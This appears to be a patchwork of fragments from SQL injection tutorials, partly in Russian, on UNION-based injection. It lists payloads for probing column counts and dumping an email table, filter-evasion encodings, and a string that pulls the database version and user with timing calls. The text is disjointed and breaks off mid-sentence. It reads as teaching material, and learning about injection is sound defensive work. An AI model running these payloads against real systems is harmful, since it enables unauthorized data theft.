UNION ALL SELECT NULL, *, NULL, NULL FROM email. I understand what this does and why; the hacker needs to create a query that has the same number of columns as the query it's being merged with, and shifted around the * to make sure the emails are displayed.
' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- etc.
1' UNION SELECT null,null,null-- - Worked. You should use nullvalues as in some cases the type of the columns of both sides of the query must be the same and null is valid in every case.
union+sel%0bect null,null,null,null. +#1q%0Aunion all#qa%0A#%0Aselect null,null,null,null.
' Union select null --' union select null,null --' union select null,null,null
The following commands detect the number of the columns in the database. ' Union select null-- ' union select null
1' UNION SELECT null-- - Not working 1' UNION SELECT null,null-- - Not working 1' UNION SELECT null,null,null-- - Worked. Why are null values used? There are cases in which the type of the columns on both sides of the query have to be the same.
Null,null,null,null,null,null,null,null,null,null,null,null,null– union all select @@version,user(),sleep(5),benchmark(1000000,MD5(‘A’)),null,null,null,null,null...
Почему используется значение NULL? Все просто, типы данных в каждом столбце должны быть совместимы между исходным и внедренным запросами.
' UNION SELECT NULL-- ' UNION SELECT NULL, NULL-- ' UNION SELECT NULL, NULL, NULL-- и т.п. Если количество нулей не соответствует количеству столбцов, база данных возвращает ошибку, например